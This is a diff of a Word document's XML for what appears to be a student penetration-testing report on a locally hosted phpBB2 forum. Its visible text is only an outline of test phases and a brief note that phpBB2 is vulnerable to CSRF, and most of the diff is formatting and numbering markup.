+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> is the automatic mapping of a website.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>A recursive program that follows all HTML links from the document</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Can revel </w:t>
       </w:r>
       <w:bookmarkStart w:id="4" w:name="_GoBack"/>
       <w:bookmarkEnd w:id="4"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>Penetration/Attack</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Gain and maintain connection for objective to be completed.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Install back doors </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Covering Tracks</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="5" w:name="_Toc444877084"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Conclusion</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="5"/>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>Notes</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>LAMP architecture is made up of LINUX, APACHE, MySQL database management and PHP.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Version of PHP installed - phpBB2.0.23</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Local </w:t>
+      </w:r>
       <w:r>
         <w:t>WAMP server installed</w:t>
       </w:r>
@@ -1194,7 +2037,7 @@
       <w:r>
         <w:t xml:space="preserve">Any version of phpBB2.x security can be exploited by a CRSF (Cross-site request forgery) attack. Looked this up briefly </w:t>
       </w:r>
-      <w:hyperlink r:id="rId8" w:history="1">
+      <w:hyperlink r:id="rId9" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -1207,8 +2050,8 @@
       </w:r>
     </w:p>
     <w:sectPr>
-      <w:headerReference w:type="default" r:id="rId9"/>
-      <w:footerReference w:type="default" r:id="rId10"/>
+      <w:headerReference w:type="default" r:id="rId10"/>
+      <w:footerReference w:type="default" r:id="rId11"/>
       <w:pgSz w:w="11906" w:h="16838"/>
       <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="708" w:footer="708" w:gutter="0"/>
       <w:pgNumType w:start="0"/>
@@ -1285,7 +2128,7 @@
           <w:rPr>
             <w:noProof/>
           </w:rPr>
-          <w:t>2</w:t>
+          <w:t>3</w:t>
         </w:r>
         <w:r>
           <w:rPr>
@@ -1362,6 +2205,841 @@
     </w:r>
   </w:p>
 </w:hdr>
+</file>
+
+<file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
+<w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 wp14">
+  <w:abstractNum w:abstractNumId="0" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="21503A6E"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="B64C11C4"/>
+    <w:lvl w:ilvl="0" w:tplc="DA3E27B6">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="–"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="360"/>
+        </w:tabs>
+        <w:ind w:left="360" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="FFC27BC4">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="–"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1080"/>
+        </w:tabs>
+        <w:ind w:left="1080" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="8A72B5A8" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="–"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1800"/>
+        </w:tabs>
+        <w:ind w:left="1800" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="7128749A" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="–"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2520"/>
+        </w:tabs>
+        <w:ind w:left="2520" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="9E40A730" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="–"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3240"/>
+        </w:tabs>
+        <w:ind w:left="3240" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="6826D4AE" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="–"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3960"/>
+        </w:tabs>
+        <w:ind w:left="3960" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="C66E1362" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="–"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="4680"/>
+        </w:tabs>
+        <w:ind w:left="4680" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="12C43218" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="–"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5400"/>
+        </w:tabs>
+        <w:ind w:left="5400" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="09404058" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="–"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="6120"/>
+        </w:tabs>
+        <w:ind w:left="6120" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="25C0687D"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="A1C23AAA"/>
+    <w:lvl w:ilvl="0" w:tplc="8FF2BC2E">
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="-"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="405" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Calibri" w:cstheme="minorBidi" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="08090003">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1125" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="08090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1845" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="08090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2565" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="08090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3285" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="08090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4005" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="08090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4725" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="08090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5445" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="08090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6165" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="3A050D93"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="FE20D18E"/>
+    <w:lvl w:ilvl="0" w:tplc="D168FF54">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="–"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="720"/>
+        </w:tabs>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="C7326FE0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="–"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1440"/>
+        </w:tabs>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="613CD2AC" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="–"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2160"/>
+        </w:tabs>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="B5BA129C" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="–"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2880"/>
+        </w:tabs>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="3DF072BA" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="–"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3600"/>
+        </w:tabs>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="B5F4C2B6" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="–"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="4320"/>
+        </w:tabs>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="7850FB00" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="–"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5040"/>
+        </w:tabs>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="E2BCCA70" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="–"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5760"/>
+        </w:tabs>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="C0D8C67E" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="–"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="6480"/>
+        </w:tabs>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="3BEE5602"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="89864440"/>
+    <w:lvl w:ilvl="0" w:tplc="C19C0116">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="•"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="720"/>
+        </w:tabs>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="F70ABD68" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="•"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1440"/>
+        </w:tabs>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="D1E28932" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="•"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2160"/>
+        </w:tabs>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="DD6641BC" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="•"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2880"/>
+        </w:tabs>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="2946ED6C" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="•"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3600"/>
+        </w:tabs>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0DA85D3C" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="•"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="4320"/>
+        </w:tabs>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="4ABA3C2E" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="•"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5040"/>
+        </w:tabs>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="39C4968A" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="•"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5760"/>
+        </w:tabs>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="CDFCCCE8" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="•"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="6480"/>
+        </w:tabs>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="457D12F5"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="F4BA2FEA"/>
+    <w:lvl w:ilvl="0" w:tplc="99CCBC6E">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="–"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="720"/>
+        </w:tabs>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="7D2CA620">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="–"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1440"/>
+        </w:tabs>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="BCBE6B70" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="–"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2160"/>
+        </w:tabs>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="07CEBD64" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="–"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2880"/>
+        </w:tabs>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="3EF6D2BA" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="–"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3600"/>
+        </w:tabs>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="DDD24A46" w:tentative="1">
+      <w:start w:val="1"/>
